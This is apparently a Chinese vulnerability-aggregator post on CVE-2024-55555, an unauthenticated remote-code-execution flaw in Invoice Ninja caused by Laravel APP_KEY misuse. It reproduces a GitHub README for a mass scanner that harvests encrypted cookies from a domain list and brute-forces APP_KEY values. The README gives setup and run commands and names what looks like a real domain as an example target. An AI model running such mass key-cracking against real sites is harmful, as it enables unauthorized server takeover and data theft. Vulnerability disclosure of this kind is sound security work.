Invoice Ninja Laravel APP_KEY 远程代码执行漏洞

漏洞信息

漏洞名称: Invoice Ninja Laravel APP_KEY 远程代码执行漏洞

漏洞编号:

  • CVE: CVE-2024-55555

漏洞类型: 命令执行

漏洞等级: 严重

漏洞描述: 受影响产品: Invoice Ninja是一款开源的发票和账单管理软件,广泛用于企业和个人用户中,用于生成发票、管理客户和支付。它基于Laravel框架构建,提供了丰富的功能和灵活的部署选项。由于其开源和易用性,Invoice Ninja在全球范围内有广泛的应用。

漏洞解释: 该漏洞(CVE-2024-55555)是一个未经身份验证的远程代码执行(RCE)漏洞,存在于Invoice Ninja中,由于Laravel的APP_KEY使用不当导致。具体来说,如果APP_KEY是已知或可猜测的,攻击者可以利用它解密cookie或序列化数据,进而构造恶意载荷执行任意PHP代码。这种漏洞的根本原因在于应用程序未能安全地管理和使用加密密钥,导致攻击者可以绕过安全限制执行远程命令。

影响分析: 此漏洞的安全风险极高,攻击者无需身份验证即可远程执行任意代码,可能导致服务器完全被控制、数据泄露或服务中断。由于漏洞利用条件相对简单,且存在自动化工具(如Laravel Crypto Killer Mass Scanner)可以大规模扫描和利用,因此威胁程度非常严重。企业用户应立即检查并更新其Invoice Ninja实例,确保使用了强APP_KEY并采取了其他安全措施以防止潜在的攻击。

产品厂商: Invoice Ninja

产品名称: Invoice Ninja

来源: https://github.com/Yucaerin/CVE-2024-55555

类型: CVE-2024:github search

仓库文件

  • mass.py
  • readme.md

来源概述

Laravel Crypto Killer Mass Scanner (CVE-2024-55555)

This script performs a mass scan of Laravel-based applications vulnerable to CVE-2024-55555, an unauthenticated remote code execution (RCE) vulnerability in Invoice Ninja. It automates the process of detecting sites using weak or known APP_KEY values and checks whether they are vulnerable.

📌 How It Works

  1. Reads a list of domains from list.txt.
  2. Sends a request to each target and captures the Laravel-encrypted cookie (excluding XSRF-TOKEN).
  3. Runs a brute-force decryption using laravel-crypto-killer to find a valid APP_KEY.
  4. If a valid key is found, the result is saved to result.txt in the format:
1
domain.tld|base64:APP_KEY

🧱 Requirements

Before using this tool, you must install and configure laravel-crypto-killer.

🔧 Install Laravel-Crypto-Killer

1
2
3
git clone https://github.com/synacktiv/laravel-crypto-killer.git
cd laravel-crypto-killer
pip install -r requirements.txt

⚠️ It’s recommended to use a Python virtual environment.

🗂️ Wordlists

Ensure that the wordlists/ folder contains appropriate keys to brute-force with. You can use the default ones or add your own APP_KEY values (in base64: format).

🚀 Usage

  1. Prepare your list.txt with one domain per line (no http or https required):
1
2
portal.upnode.com.au
account.example.com
  1. Run the script:
1
python3 mass_laravel_crypto_bruteforce.py
  1. If successful, the script will output:
1
[+] Key found for account.example.com: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=

And save it in result.txt.

🛡️ About CVE-2024-55555

  • Vulnerability: Invoice Ninja does not properly secure Laravel APP_KEY usage.
  • Impact: If the APP_KEY is known or guessable, remote attackers can:
    • Decrypt cookies or serialized data.
    • Craft malicious payloads.
    • Execute arbitrary PHP code.
  • Reference:

🧠 Notes

  • The script automatically selects the longest cookie (excluding XSRF-TOKEN) assuming it’s the encrypted session.
  • Parallel scanning is supported via ThreadPoolExecutor for faster performance.
  • Only targets with Laravel-encrypted cookies will be processed.

✅ Example Output

1
[+] Key found for account.example.com: base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=

⚠️ Disclaimer

This tool is for educational and authorized testing only.
Do not use this on systems without explicit permission.
You are solely responsible for your actions.

Github Poc
#命令执行 #CVE-2024:github search
Invoice Ninja Laravel APP_KEY 远程代码执行漏洞
http://example.com/2025/08/01/github_326564460/
作者
lianccc
发布于
2025年8月1日
许可协议